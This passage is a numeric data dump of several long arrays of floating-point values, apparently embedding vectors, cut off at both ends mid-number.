014461583,-0.0036901466,-0.027738802,0.002849491,-0.039513946],[-0.0015948424,0.010466013,-0.15232392,-0.09200948,0.095583886,-0.07795287,0.0003680465,0.062665775,-0.034393307,-0.0371356,-0.0046725012,0.051118936,0.055315755,-0.008972247,-0.031601865,-0.071268275,-0.01964212,-0.0049112183,-0.061102312,-0.006146554,0.017844172,-0.077218495,0.0359978,-0.029926369,0.080199935,-0.002608073,-0.030439321,0.035754394,-0.05486104,0.0033343395,0.03023275,-0.042972982,-0.047493175,-0.02284057,-0.07855134,-0.04817548,0.025380798,-0.026149986,-0.056602575,0.027137622,0.06422514,-0.028408865,0.0023885001,-0.03981615,0.007777696,-0.046165332,0.03941607,0.04789315,0.029684234,-0.07801201,-0.03244247,-0.040928073,-0.01872279,-0.0155385155,0.06546551,-0.012647115,0.012174733,0.011525147,0.023898432,0.008827098,0.060520865,0.053407863,-0.03709155,0.032472834,0.049266446,-0.0039216997,-0.023908762,0.040579114,0.0033315755,-0.0061168363,0.06194716,-0.03503587,-0.002184233,-0.0069392407,-0.0026316247,-0.012703573,-0.034408133,-0.08302813,-0.010614237,0.06896812,0.03906246,-0.041349027,0.0265,-0.02209098,0.051965848,-0.0058392347,-0.035741024,0.011255828,-0.015122676,0.056548923,0.00038298752,-0.010516077,0.058126885,0.03211744,-0.04413084,0.041054465,0.022570645,0.02280544,-0.0062976805,-0.0048746266,-0.011488507,0.03956256,0.02283946,-0.015579865,-0.0031072993,0.020269098,-0.017728044,0.052955035,0.026788859,-0.051143736,0.01701128,0.08003894,-0.0050152387,-0.0096873585,0.059438635,-0.043524276,0.038867697,-0.0077374806,0.0064650187,0.07732933,-0.0034373698,-0.019228095,-0.022248037,0.06012109,0.034261316,0.060550846,-0.06371128,0.026060278,-0.0023283707,-0.04709751,0.000042438904,-0.030709695,-0.028152954,0.027780168,0.022657976,0.0044706184,-0.0420385,-0.041036393,0.045847513,0.005817313,-0.0046594744,0.036680985,0.0068849074,-0.039220575,-0.019094262,0.0017077071,-0.0036093367,-0.057751387,-0.04177206,0.014601764,0.00896002,0.051795106,0.008590584,0.053379796,0.049319405,-0.04410304,0.042183984,-0.006537348,0.034557484,0.07257196,0.03348119,0.03705327,-0.059771083,0.07235541,-0.013688929,-0.037947793,-0.00045588243,0.045135792,0.012733967,-0.0034980087,-0.027332189,0.004697883,-0.037350502,-0.033457786,-0.011527797,0.040874846,0.022123547,0.015919503,0.04086514,-0.0077828057,0.036514714,-0.038739655,0.04509034,-0.044624854,-0.020756165,-0.004700875,-0.013550175,-0.02041154,0.007620325,-0.043988105,0.018059846,-0.009560237,-0.066354714,-0.014252568,-0.017949933,-0.029231794,0.033503518,-0.005772576,0.04838943,0.013580656,-0.039474376,0.026688572,-0.033167426,0.013826571,-0.044769116,0.04537662,-0.046118878,-0.011752101,-0.03080849,0.013410777,0.060334798,0.020592084,-0.042653795,-0.010842035,-0.0061265267,-0.009619512,0.011328715,-0.046173654,-0.045270473,-0.014096782,-0.0019363846,-0.042898864,0.02730852,-0.00086815754,0.025672551,-0.017146174,-0.031745024,0.025394725,-0.026263399,-0.0018007235,-0.0047382344,-0.06247517,0.03201737,0.022487883,-0.0077701597,-0.02384191,-0.0030211979,0.07246561,0.0011992153,-0.0006948776,-0.0056377356,0.04114586,-0.053291574,0.0019728593,-0.05633929,0.03249174,-0.01873565,-0.027593581,0.0011331128,0.012344585,-0.0030853166,0.029838638,0.037113048,0.0054324223,0.06540302,-0.07986658,0.03756641,0.039892763,0.008178142,-0.026195325,-0.013923843,0.009512527,0.007866588,-0.08108923,-0.013555372,-0.053708065,-0.049776416,0.05930431,0.022847785,-0.037020866,0.025550568,0.004882283,0.022299748,0.027563216,0.036378156,0.006728886,0.030058447,-0.0051675616,-0.04043109,-0.029616335,-0.046064552,-0.03256378,0.027503438,0.0051412443,0.027245885,0.011727001,0.054660797,0.021727588,-0.0053012893,-0.012793803,0.04685104,-0.016767727,-0.04908585,0.023999725,-0.024491793,0.018685723,0.058113806,-0.038567405,-0.011900366,-0.010227099,0.03166239,0.042912662,0.06310746,0.062228497,0.012687057,0.024547523,-0.010777672,-0.023932362,0.06150876,-0.020776588,-0.021470638,0.0055195075,0.006442648,0.08180827,-0.036307447,0.07005273,0.037467893,0.02792065,0.0075950567,0.050473884,0.032082252,-0.030075913,-0.006284352,-0.07162782,0.014902509,-0.010195126,-0.008855899,0.044415984,-0.024127197,-0.058698505,-0.0033618321,-0.045683768,0.0534404,-0.05155276,-0.056922495,0.039154828,0.05575398,0.028257418,-0.010623413,0.049705483,-0.009941004,-0.02657196,0.005763766,-0.035154615,-0.0026735403,0.016797274,-0.042140685,0.006255093,0.04784931,0.014660475,-0.017065601,0.053339943,-0.023432776,-0.005344557,-0.023643576,0.005079653,0.02039451,0.042619813,0.0132923545,-0.008464915,0.024702981,-0.022663735,0.0062696696,0.008614559,0.010146064,0.029894587,0.02248138,0.013541454,0.023932248,-0.008864685,-0.02313316,0.00888838,-0.01485552,0.015883643,0.009726711,0.0010506329,-0.072059646,0.038780138,0.0018303517,0.035521038,0.030570716,-0.0618177,-0.016476741,0.046418034,0.043944187,-0.022509258,0.02420381,0.004909093,-0.06072199,0.020696545,0.031575777,0.007229127,-0.013759632,-0.002735818,0.0068725813,-0.0075805243,0.014660836,-0.018215198,-0.030975457,0.019423883,-0.039415836,-0.08451212,0.01243718,-0.0048426334,-0.017912265,0.020198442,-0.037782747,-0.022942128,0.048461244,0.026055833,0.02127606,-0.013430412,0.03213557,-0.07171135,0.007278244,0.014070801,0.07110953,0.029699642,0.018963546,-0.050543126,0.02559926,-0.00350346,0.02790172,-0.00018306708,-0.015800774,0.038983863,0.055286508,0.08096136,-0.013990321,-0.050871108,-0.01389427,0.03632117,0.032110833,0.0036487775,-0.012560863,0.016980164,0.01432271,0.005002269,-0.015362915,0.0127553595,0.04958784,-0.03417718,-0.05779939,-0.031371165,0.002788104,0.090272844,0.09203535,-0.033793878,-0.016380245,0.075111695,-0.0071425857,-0.018102108,0.004315725,0.033104796,0.111882485,-0.017387275,0.03297567,-0.023122422,0.0031229635,0.006944725,-0.0021682072,0.009832955,-0.052069318,-0.012456081,0.0072536115,-0.00029503668,0.0025428368,-0.026422407,0.04681011,0.042117827,-0.06024875,-0.024106076,0.010988314,0.019260567,0.010056867,-0.004804811,-0.0024547498,0.03864831,-0.047703482,0.06798483,0.016768903,-0.018624734,-0.05362933,-0.03237601,-0.043618042,0.04664474,-0.012838468,0.0071989894,-0.02254493,0.020696858,0.00026967746,0.024632277,-0.00421557,0.055712473,-0.01650338,-0.04990888,0.010513291,0.012101816,0.000712791,-0.018378865,0.0641369,-0.0417585,-0.011973176,0.043044347,0.014509663,-0.04530592,0.0055533503,-0.01659465,-0.039966058,-0.05924911,0.038242664,-0.008167941,-0.013506038,0.013658711,0.04413463,-0.02686293,0.0091672335,-0.034209415,-0.04805074,0.035417505,0.015916685,-0.0024314942,0.00062373787,0.009761437,-0.055888053,0.014719912,-0.023839213,0.0011422314,0.034296766,-0.05248465,0.023521014,-0.041959114,-0.022026647,-0.017013922,0.030117614,-0.014576293,-0.039289307,0.05407062,0.024848992,0.039765947,-0.029301386,0.0038786563,-0.007890392,-0.03292583,-0.0027114877,-0.049785852,-0.027165392,0.046073947,-0.019469889,-0.030871497,0.023814788,-0.08134783,0.020680388,-0.056315884,0.03335553,-0.039416313,0.003252677,-0.00206988,0.017300688,-0.016365005,-0.024538562,-0.0073946286,0.02977187,0.0068620634,0.029845763,-0.022695053,-0.03533167,-0.0045776507,0.018963356,0.02703417,-0.05439447,-0.044874497,-0.010656571,-0.053848792,-0.012723894,0.010883267,0.025555992,0.013301366,-0.0551367,-0.062694654,0.016126405,-0.037751578,0.032626905,-0.022296324,-0.031804673,0.0005617637,-0.029947605,-0.041729085,0.029397508,0.0010157955,-0.023416007,-0.00014984251,0.005792141,-0.020128705,0.026989968,0.022941492,-0.0076189,-0.0022267755,-0.038433347,-0.026874945,-0.020442909,-0.0138693,0.047811918,-0.028722007,-0.018978713,0.036531862,0.0006059784,-0.020716697,-0.041054398,-0.019965341,-0.004226484,-0.0067089894,-0.021607397,-0.006577783,0.0042697047,-0.027427677,0.04897013,-0.009548157,-0.012987248,-0.053219903,0.014142024,-0.040932592,0.07534552,-0.021468349,0.0850315,0.022101965,-0.034926135,0.016692055,-0.019855214,0.045607664,-0.008454925,0.008766145,-0.084255405,-0.059054706,-0.073291495,0.056232248,-0.016464246,0.018244578,-0.012936961,0.08775576,0.07394301,0.049347397,-0.0005807861,-0.03610328,-0.014604073,-0.023911562,0.0073045976,0.03436878,-0.007691763,0.01885394,0.06645211,0.09482368,0.020797951,-0.02035626,0.089131445,-0.021377388,0.039364815,0.0047379867,-0.030656261,-0.040723424,-0.006711711,-0.042741142,-0.0787878,0.022823315,0.049336433,0.017406505,-0.01902696,-0.021929428,-0.052544925,-0.06501721,0.028838295,0.04458892,-0.0041662147,-0.00024994384,0.056408975,-0.0278959,0.06959738,0.0130713405,-0.032383293,-0.025477562,-0.004881484,-0.004161017,0.057167526,0.006060648,0.0033737277,-0.051654197,-0.01065097,-0.041366175,-0.05024159,-0.02630609,0.002626722,0.011027291,0.0023130332,-0.032953873,0.00871519,0.045577433,0.009032455,-0.04045583,-0.058757402,0.059986506,0.009086861,0.017339459,-0.013655708,0.012717682,0.008848994,0.013820287,-0.0074277543,0.013926517,-0.012341763,-0.018582033,-0.028787898,0.06357596,-0.0086306725,0.054514766,-0.028378138,0.040496673,-0.009706664,-0.016983805,0.007614085,0.0020618523,0.057794776,-0.004094946,-0.057268377,0.024098482,-0.010233614,0.0020947878,-0.002183562,0.015817741,0.048944198,-0.010306216,-0.014066802,-0.010614481,-0.057787005,0.043895956,-0.012276725,0.02563627,0.014974958,0.001317501,-0.049151316,-0.046608467,0.0018228503,0.04617325,-0.012569823,0.028979288,-0.016789636,-0.0064360206,-0.036003597,0.01752548,0.030612363,-0.021735528,0.081151664,0.013865017,-0.014654126,0.030620014,-0.03334611,-0.046191785,0.019383768,0.037728254,0.0629432,0.024427831,0.045745242,-0.0417782,-0.020521818,0.044465084,-0.03835261,-0.059131775,-0.04712734,-0.04118421],[-0.0002622926,0.0330715,-0.15243694,-0.06715657,0.080371365,-0.038919844,0.009831742,0.047109894,0.012225797,-0.053054493,-0.018190352,0.07857457,0.09405775,-0.0398068,-0.033435747,-0.005719279,0.003420287,-0.071241975,-0.006190055,0.03138944,0.002348159,-0.05909151,0.019818803,-0.042432025,0.07980926,-0.0044919685,-0.028145429,0.01314009,0.005974939,0.070924625,0.02042796,0.0066397865,-0.0086367335,-0.007894129,-0.055088144,-0.09532133,0.009618681,0.03620877,-0.011378579,0.013563252,0.010828656,0.024373306,0.010444998,-0.047802877,-0.0055523417,-0.017425133,0.08767043,0.032523807,0.06767789,-0.06246938,-0.050679646,-0.055449747,0.036549777,-0.043830235,0.061596073,0.022038445,0.00093210215,0.015287095,0.011017874,-0.027466504,0.073507056,-0.010760073,0.024251515,0.029557902,0.045289606,-0.0049578347,-0.012722538,0.036407124,0.00991362,0.026234882,0.027478581,0.0378082,-0.014389634,0.006129949,-0.07310248,0.0058509703,-0.029031182,-0.016615296,-0.025636144,0.038638335,0.02377942,-0.014884537,0.07022674,-0.039861813,0.027749244,0.03433976,-0.0091942325,-0.016294505,-0.027804421,0.014384148,0.00080418953,-0.008009796,-0.019332668,0.04155245,-0.076641686,0.015234739,0.038770407,0.015631672,-0.009111157,-0.030389166,-0.032198254,0.04049824,0.021012858,0.015537191,-0.034486096,0.000020773483,-0.011185678,-0.0006757982,0.0073195053,0.0048769065,0.0077673886,-0.00987679,-0.039749987,0.012688193,0.029484984,-0.009244784,0.04710804,-0.027548356,0.005567411,0.037498783,0.006878289,0.008928106,-0.011480896,0.040799182,0.009411827,0.022295026,-0.05463569,-0.0037023597,-0.0073863203,-0.047337305,-0.019125588,-0.00006571148,-0.035510678,0.03913008,0.01881192,0.034269042,-0.030133838,-0.042854626,-0.01703787,-0.034838572,0.027562844,0.06186945,0.013266153,0.009231931,-0.018414326,-0.021414619,0.012928276,-0.009400261,-0.06204437,0.05149897,-0.005258489,-0.037970718,0.015589707,0.0007013307,-0.0032884837,-0.021313446,0.007806386,0.022397963,0.038791638,0.018728731,0.017968949,0.017998986,-0.07496619,0.030867867,0.0004410583,-0.06260276,0.041008707,0.037001103,0.01333841,-0.021367023,-0.040357836,0.0084006,0.0012853972,-0.04866859,-0.012637486,-0.021775717,-0.016852424,-0.0069166953,0.04123882,-0.025984745,0.05254421,-0.05430614,0.050134677,0.017419375,-0.024697237,-0.05211826,0.0051421225,-0.019086348,-0.007178198,-0.02290207,0.036731467,-0.031126715,-0.013105908,-0.02925678,-0.02022081,-0.026466327,0.07365785,0.005898654,0.009353857,-0.019098617,-0.0861449,-0.0038796219,-0.049690194,-0.006168583,0.0006332752,0.029451521,0.016371397,0.020429874,-0.045604456,0.051462088,0.05449964,0.004192948,0.019934852,-0.01910279,-0.014447586,-0.019271934,0.03810881,-0.023342362,-0.04292031,-0.028198125,0.020440588,-0.012530073,0.017852003,0.022432258,0.03784744,0.04374581,-0.0018745402,0.011376278,-0.0077719125,-0.034730263,-0.018362878,-0.071659796,0.06811517,-0.008261688,0.028753242,-0.04052808,0.0059269695,0.07211333,-0.0132428715,0.00352217,-0.0128269335,-0.016930489,-0.013891675,0.04991153,-0.044133406,-0.030890005,-0.010974595,-0.035118,-0.004351968,0.04791241,-0.0232337,0.009684933,-0.0050135767,0.017074535,0.0694537,-0.019798454,-0.023546407,0.0177141,0.0067075477,-0.044084866,-0.008068449,-0.013257285,0.017027833,-0.07623389,-0.03347302,-0.040638108,-0.09750052,-0.012126514,0.040144425,0.015684478,-0.007663192,0.0193343,0.047692075,0.03558954,0.025444156,0.046246752,-0.0022217808,0.01119274,-0.031420086,-0.004953946,-0.06855766,-0.022049505,-0.030215062,0.07117511,-0.027065575,0.03879596,-0.0028506895,-0.041727584,-0.00845983,-0.016334262,0.025244864,-0.06885671,0.0031344267,0.032255508,-0.021117268,0.0010268625,0.044363976,0.014010682,0.05421126,-0.043134198,0.038072396,0.07457471,0.054360464,0.030882342,-0.026126986,0.015145981,0.05272001,-0.0257932,-0.0006216148,-0.018637339,-0.01994051,-0.011443161,-0.06812172,0.050460435,-0.031202478,0.040252358,-0.008029803,0.036408547,0.028473534,-0.042417176,-0.028565397,-0.1085068,0.012883485,-0.020526906,-0.013362402,0.010079149,0.009894018,0.024034234,-0.056707505,-0.06292717,0.020862246,0.026671188,-0.0061102198,-0.025536884,-0.043796428,0.01616411,0.013530605,0.019123122,0.0040241564,0.0164989,0.019395316,-0.03985214,0.009923582,-0.06645857,-0.0037671768,0.03682044,-0.030638738,0.03128109,0.030497056,0.046462424,-0.023143778,-0.0036144017,0.002530613,0.0151729025,0.0042162994,0.0016113943,0.033859786,0.0059931586,0.011235382,0.020327736,0.056877967,0.031105347,0.0020195951,-0.017455455,-0.0003586642,0.052651428,0.022106223,0.008610309,0.004021074,0.013649402,-0.049492262,-0.0204625,0.0016666376,0.037334334,0.00708149,0.0032847696,-0.03926808,0.083811425,0.0023094208,0.044596907,0.01189343,-0.02541113,0.012309953,0.057386998,-0.004035663,-0.022910712,0.0349524,-0.0111168865,0.03377378,0.044740923,-0.004482594,-0.059982605,-0.012733037,0.0017554972,0.04125442,-0.045086395,-0.032264978,0.003424173,0.017665276,0.05192958,-0.074167475,-0.10377258,-0.021513255,0.015128395,-0.02555896,-0.042096652,-0.04074347,-0.012546429,0.060843393,-0.023758762,0.078499034,0.0022321509,0.0066177724,0.016544726,0.015628956,0.0363553,0.071558155,0.056284282,-0.05474389,-0.015197488,-0.0025089239,0.038478885,0.059849426,0.014391606,-0.025453608,-0.054921135,0.0077945343,0.066193156,0.06081698,-0.03345877,0.009022216,0.053819723,0.049285613,-0.008955364,-0.05680429,0.029589942,0.030560398,0.026189713,0.002910216,0.023816975,-0.0019491082,-0.031632017,-0.011387593,-0.013517964,0.008674446,0.084276505,0.07045548,-0.03289894,-0.03550086,0.03476639,-0.02381143,0.027553601,0.0073909913,-0.0020769874,0.06250185,-0.005572443,-0.00032688832,0.048089482,0.035090733,0.047232825,-0.0025717888,0.040643834,-0.044397775,-0.029117813,0.015283784,0.013383256,-0.04089359,-0.03264599,0.028852029,0.038711634,-0.07244903,-0.0024364886,0.026648978,-0.018727051,0.013817449,0.023446236,0.006539981,0.008053744,-0.008847771,0.035165515,-0.011742334,-0.016992649,-0.036133867,-0.035069536,0.0040767645,0.026910502,0.030926608,-0.02607925,0.030160282,-0.0034423342,-0.00799921,0.014987186,0.008698141,-0.027265059,-0.008666761,-0.035901837,-0.009337816,0.016844926,-0.014134452,-0.04866448,-0.010962379,-0.011433802,-0.011998356,0.021783901,0.027817331,-0.037424512,0.035689205,-0.036935605,-0.06028678,-0.059806116,0.048280835,-0.0036732033,-0.001683836,-0.0027377515,0.052803162,-0.040086664,-0.013474774,0.020493021,-0.06594591,-0.010383601,-0.0010400994,0.004881953,-0.033998106,-0.00093886873,-0.058395162,0.0050464016,-0.03534461,-0.039627634,0.04470671,-0.051843993,-0.014207701,-0.0021573913,-0.031191345,-0.025080752,0.052730113,-0.02593734,-0.002315823,0.0058182017,0.028281828,0.0235679,0.01262618,-0.018067291,-0.013064096,0.01692299,0.016229445,-0.01872332,0.0036392887,0.07384832,-0.014146976,-0.005648469,0.032635167,-0.029277267,0.0038710488,-0.0632125,0.01579736,-0.011948769,-0.02016522,0.035285056,-0.036548328,-0.038562704,-0.038330786,-0.020353524,0.01870719,-0.00018827345,-0.005460323,-0.035936385,-0.013611254,0.04682791,0.048184052,0.04454422,0.03863342,-0.06638681,-0.035721183,-0.0044461973,-0.010528925,0.04711409,0.022728844,-0.018009406,-0.018180791,-0.02717333,0.03540141,-0.064647846,0.046138294,0.024090063,0.011505418,0.048000768,-0.05083656,-0.030885823,0.0122600505,-0.071391545,-0.054661937,0.044826314,0.05213688,-0.023082167,0.011013657,0.025160668,0.0060941847,-0.0022635197,-0.038692385,-0.08890388,-0.038712066,-0.008619687,0.03595689,-0.011769543,-0.031189002,0.01750164,0.01183074,-0.029355446,-0.027586453,-0.054556765,0.023968156,-0.014894925,-0.053481117,0.011666054,0.041202243,0.0060901195,0.022635443,-0.019105488,0.018753294,-0.021774001,-0.033860374,-0.03346401,0.05917962,-0.03910271,0.015212386,-0.019300684,-0.025660032,-0.020081662,-0.023537438,0.037891306,-0.066513516,0.005494876,-0.057863012,-0.058559008,-0.083408125,0.017520871,0.032256726,0.0448379,-0.005201067,0.08590264,0.035435867,-0.0010219007,-0.056433592,0.038879346,0.002333973,-0.027640583,-0.00803586,0.059088625,0.06101705,-0.004716318,0.10447139,0.09102319,-0.016361805,-0.024182485,0.04434895,0.015017072,0.011511435,0.025479138,-0.061910026,-0.053775065,0.010650934,0.0134209795,-0.028713329,-0.023480155,0.06214869,0.017171782,-0.007921283,0.018770069,-0.017000053,-0.05074677,0.020717533,0.017545706,0.0001906974,-0.025266297,0.0141085135,-0.003873029,0.060705025,0.05355155,-0.033005126,-0.029435987,0.010189492,-0.006806637,0.06930686,-0.014910696,-0.0010607565,-0.053237196,0.016465904,-0.015038403,-0.08367542,-0.044142593,-0.04228576,-0.021659466,-0.022917263,0.014952878,0.053846654,0.011328432,0.014334947,-0.009289731,-0.062378854,0.024745561,-0.006465527,0.043853413,0.06846994,-0.006998303,0.0060111894,-0.019788817,0.062062576,0.042652145,-0.0054003987,-0.05193103,-0.025890376,0.023716204,0.007704112,0.064074874,-0.04165251,0.022759983,0.033068933,0.0047659953,0.0095398715,0.011428322,0.026927648,0.023364093,-0.010789218,0.017822275,-0.028733462,-0.0011394515,0.052066963,-0.0074458104,0.052600034,-0.030516867,0.022298345,-0.020266458,-0.07560315,0.049262226,-0.0025754524,-0.03443234,-0.050362714,-0.043077577,-0.034091044,-0.0027632741,0.00068950263,0.001666434,0.007093141,0.034064285,-0.009126884,-0.0046655256,-0.051823616,0.060686644,0.0149506675,-0.016678132,0.06479231,-0.029662862,-0.020098848,0.027311007,-0.029803308,-0.022634104,-0.03277945,0.030941939,0.08200922,0.030448448,0.055301964,-0.020016976,-0.0093104625,0.026907418,0.016168518,-0.08253001,0.0014461754,-0.043701958],[0.029993057,0.071585074,-0.19854559,-0.021474697,0.09830659,-0.054439865,0.009406843,0.05199332,-0.018724926,-0.10396247,-0.03215433,0.023656862,0.060457133,0.044737205,-0.03266068,-0.010344659,-0.002747632,-0.042308744,-0.017046819,-0.028177772,-0.016456623,-0.038338244,-0.010186648,0.009650885,0.07026366,0.031132296,-0.015315347,0.015997706,-0.01908109,0.0447238,0.0067248936,0.027638186,-0.05893866,-0.0043542916,-0.036036044,-0.07660342,0.007089397,0.0017787161,0.0050057056,0.030469561,0.051659938,-0.019666187,0.03007112,-0.037852187,0.041330658,-0.01007928,0.030223297,0.0059566004,0.043760862,-0.084714994,0.0013942776,-0.030197361,0.027406076,-0.035658274,0.07441515,-0.04027865,0.018743353,0.013071138,0.014840981,-0.020205274,0.029496424,0.05837311,-0.030807719,0.069619045,-0.009787655,0.00087519386,-0.05897108,0.0062818257,0.048603885,-0.033144712,0.025412967,0.053404085,-0.017614104,0.005562393,-0.012610834,-0.006133146,-0.0598306,-0.06606884,-0.0010700854,0.009095035,0.018297581,-0.036544245,0.039593108,-0.029406393,0.011692979,-0.032896526,-0.0373801,0.039099436,-0.017031033,-0.017384484,-0.029317232,-0.0019892438,-0.0051011727,0.06628297,-0.07017893,0.008052655,0.018431542,0.0005021005,-0.026736405,-0.094857804,-0.035046358,0.022114785,0.012459408,0.021470107,0.015112547,0.013924032,0.011367214,0.014964094,0.015539029,0.011714252,-0.027119085,0.051172584,0.025435526,-0.033721488,0.040615644,-0.044997755,0.02690759,-0.0248394,-0.0014227893,0.04676349,-0.027978575,-0.04351618,-0.024735184,0.024018468,0.06576489,-0.0070386645,-0.04598515,0.009996721,0.019738369,-0.0648761,0.013811915,-0.018254688,-0.01668719,0.0019780383,0.04425606,0.0505569,-0.016525777,-0.021031385,0.043305263,-0.0005778095,0.030203266,0.0038110164,0.020061655,-0.06890448,-0.00001653505,-0.009656021,-0.009735953,-0.018399501,-0.009032259,-0.0022535233,-0.019795028,0.022547752,-0.016054442,0.00682045,0.05816057,-0.07224893,-0.014353213,0.025477119,-0.011982189,0.029540736,0.047401275,-0.034893468,-0.026782926,0.044447564,0.0043300493,0.010743298,0.01819269,0.06529591,-0.055074655,0.037661258,-0.05794209,0.012990287,0.0009663809,-0.011002971,-0.007881532,-0.00045151552,-0.011289991,-0.030824387,0.0120679,-0.019936588,0.034212276,-0.03450966,0.07383974,0.013188635,-0.013117783,0.006792194,-0.022378314,-0.00022529736,-0.014097892,-0.001678554,0.006273735,0.0029975954,-0.034850407,-0.0033537603,-0.028346295,-0.009261024,0.02393831,0.0077991863,0.030713758,0.0057009915,-0.048260894,-0.007393667,0.004431107,0.003425943,-0.04063466,0.06465157,-0.02721253,0.025645228,-0.019959241,0.0581095,0.07580779,-0.027760515,0.015821075,0.009056967,-0.011185341,-0.007711941,-0.023703208,-0.04414899,-0.07756611,0.013341687,0.052404493,0.028742978,0.040515978,-0.016667755,0.047277864,-0.0060690227,-0.043392636,-0.019305756,-0.008477194,0.0120437015,0.0074552414,-0.10788781,0.033639796,0.014821086,-0.023933943,0.0371002,0.026541896,0.07084003,-0.026932884,0.031211704,-0.021442382,0.016965244,-0.030446343,-0.027472246,-0.068207525,-0.00083223014,-0.041479338,-0.028545361,-0.017518524,0.020444755,-0.007907678,-0.004791892,0.031987034,0.0423563,0.016217746,-0.034203183,-0.031582136,-0.0072656344,0.016492026,-0.034914367,0.021738244,0.0071463576,0.03375244,-0.03567838,-0.005205611,-0.033104714,-0.03890777,-0.011056501,0.0009229293,0.027048368,0.06012511,0.014918129,0.029689182,0.04139287,-0.04014159,0.018132783,0.035273463,0.016802339,-0.003126948,0.04445872,-0.06887374,-0.0030216123,-0.02101833,0.020085929,-0.0067013158,-0.01642061,0.046485953,0.04001244,-0.011801348,-0.024529282,0.03964638,-0.003203256,-0.0058903643,0.04205376,-0.02683543,0.044327892,0.06489684,-0.0510254,0.0018458089,0.012000225,0.056669734,0.053916242,0.019190464,0.024553698,-0.01127036,-0.016574744,0.05150552,0.023588767,0.032011073,-0.018941747,-0.025191067,0.038540304,-0.0063111084,0.02644453,0.0068895407,0.021595074,0.07168784,0.036128525,0.020784782,0.001441377,-0.023206828,-0.007681764,-0.020777524,-0.07666619,0.0010393184,0.048944026,-0.029384183,0.014104122,-0.016580379,-0.018682694,0.0321484,0.009028294,0.0015783901,-0.0800029,-0.020211764,0.025262685,0.010231485,0.050549388,0.0050741984,0.011860848,0.03467323,0.015347711,0.021060053,-0.034013517,-0.022102885,0.043291103,-0.04713344,0.012134026,-0.0023819916,0.06544165,-0.050400738,0.029256852,-0.035419084,-0.0056566526,0.031857654,-0.012182332,0.0492986,0.0090740295,0.015577299,0.0033487442,0.05219475,0.03823309,-0.03317171,-0.03509587,-0.0047112443,0.052749746,0.013194472,0.0087697925,-0.058970135,0.0016506793,-0.019464374,-0.057092506,0.023562873,0.06642209,-0.005952236,0.039704084,-0.032189544,0.010488304,0.0039667273,-0.016718531,0.04737706,-0.026227219,0.015130228,0.038875937,0.019092249,-0.018387303,0.0153176235,-0.06615921,0.047670204,0.047276594,-0.0144707365,-0.012468492,-0.016578458,0.039106347,-0.005692102,0.005083562,0.008195395,0.0069513903,-0.03296246,0.08133724,-0.044663243,-0.08543798,-0.0010313904,-0.00053336954,-0.032412443,-0.016617803,-0.05928191,-0.035709884,0.054194476,-0.019659704,0.056987077,0.012558105,-0.018054241,-0.015226427,0.006860366,0.0036054265,0.048571307,0.026714118,0.00474991,-0.034301978,0.01963804,0.037648477,0.014278731,-0.029764272,-0.023687497,-0.02774201,0.01915605,0.038607676,0.008533999,-0.05612129,0.010322471,0.025000818,0.015104528,-0.004666942,-0.025469428,-0.009731156,0.010173935,0.027728723,0.017546877,0.08615584,0.04435761,-0.026824832,-0.055986494,-0.02567085,-0.0064756554,0.08030307,0.1268519,-0.034528222,-0.009579073,0.06388166,-0.03637021,0.0034008871,0.03426887,0.0059927204,0.08712355,-0.022774592,0.03418393,0.0017784369,0.018310728,-0.012387588,0.016966691,0.03400443,-0.04090969,-0.0071439436,-0.012577614,-0.032160424,-0.0033339118,-0.06104516,0.015521924,0.04866105,-0.033704214,-0.043151673,0.017771298,-0.00078125735,0.034683544,0.014435905,0.0036799305,0.009467664,-0.03389918,0.041448828,-0.007374733,-0.02997735,-0.004144827,-0.06869609,-0.01909945,0.021128612,0.07245488,-0.0045034457,0.0016344351,-0.036149886,0.012219887,0.041408844,-0.04894021,-0.0027814193,0.014180518,-0.028433058,0.0017142451,-0.00932059,0.0025202935,0.011401573,0.026534941,0.031368665,-0.029925192,0.052595768,0.04684265,-0.03081376,0.05276309,-0.05748595,-0.027660698,-0.01348692,0.010838523,-0.015124301,0.026321506,-0.0035994628,0.063479304,-0.059501532,0.0418769,0.012311319,-0.06950196,0.0032022998,0.014512775,-0.045664363,-0.04793068,-0.0004172156,-0.05283797,0.011261633,-0.015229371,-0.022756444,0.025377855,0.014180178,-0.04099163,-0.019356666,-0.041567616,-0.0073121195,0.020010617,-0.022946656,-0.011815214,-0.014102886,-0.0019940452,0.05334091,-0.007232569,0.037317056,0.01490747,-0.017139463,-0.04388513,-0.047418192,0.009845494,0.028406452,-0.025164476,-0.024823288,0.04793797,-0.07891896,0.03146507,-0.03960589,0.034834713,0.013468972,0.0003264113,0.01450786,-0.046697013,-0.013299108,-0.021022592,0.014390472,0.032653566,0.03896597,0.027001865,-0.03162467,-0.010253802,-0.004831231,-0.0317017,0.02518936,-0.03861488,-0.054601047,-0.065018564,-0.023174763,-0.019521369,0.0075167944,0.052083727,-0.017215515,-0.039233834,-0.020674145,0.01161117,-0.05263096,0.045160316,0.060242992,-0.007952983,-0.008512783,-0.053987443,-0.027592333,0.049839217,-0.07730078,-0.021701002,0.067879915,0.013813411,-0.012074204,0.01974545,0.025118086,-0.012307395,0.014223739,-0.052876517,-0.07401441,-0.011467753,0.03500456,0.042893782,-0.020825757,0.015130313,0.0829547,0.014893337,-0.0119402185,-0.051290788,-0.025404237,0.021669688,0.044665046,-0.007906884,-0.018550562,-0.016033743,-0.06763467,0.02915518,0.0043654377,0.039237767,-0.0072150263,-0.015715476,-0.061113283,0.04944724,-0.047335222,0.033350892,0.018112043,0.004736259,-0.06979791,0.021568814,0.018173423,-0.022108667,-0.028564956,-0.033714555,-0.019741928,-0.108536124,0.03965297,-0.007602171,0.001959814,-0.011350578,0.08785014,0.053966783,-0.0014794965,-0.0088875415,0.02971531,0.027039276,0.0013467155,0.034361634,-0.05172098,0.038051836,0.003341075,0.04116733,0.062279176,0.035604406,0.0074741505,0.03455195,-0.0035377224,0.010583049,-0.05059426,-0.08441315,-0.024995586,0.0028170554,-0.01570184,0.0035860352,-0.0128481,0.037817575,0.0043050605,0.006492934,0.017298583,-0.04769936,-0.038084287,0.01480848,0.011560059,-0.0062480536,-0.06681051,0.072293036,0.0071863625,0.035083886,0.053777874,0.01590248,-0.02180512,0.038283672,0.009295616,0.014135441,-0.061378986,-0.013805649,-0.027136508,0.010141911,0.0039401343,-0.038073357,-0.015164723,0.004645396,0.02079214,0.023465985,-0.0719564,-0.012912799,-0.005658228,0.0039377147,-0.044197313,-0.03611356,0.023949878,-0.015033328,0.015909292,0.010279597,-0.00025269034,0.020721033,-0.00042912396,-0.004824689,-0.00007432003,-0.019630617,-0.043926798,0.0068014427,0.00515316,0.028125208,0.056804948,-0.0152893355,0.056800753,-0.0065468117,0.0042683943,-0.025392037,-0.005553743,0.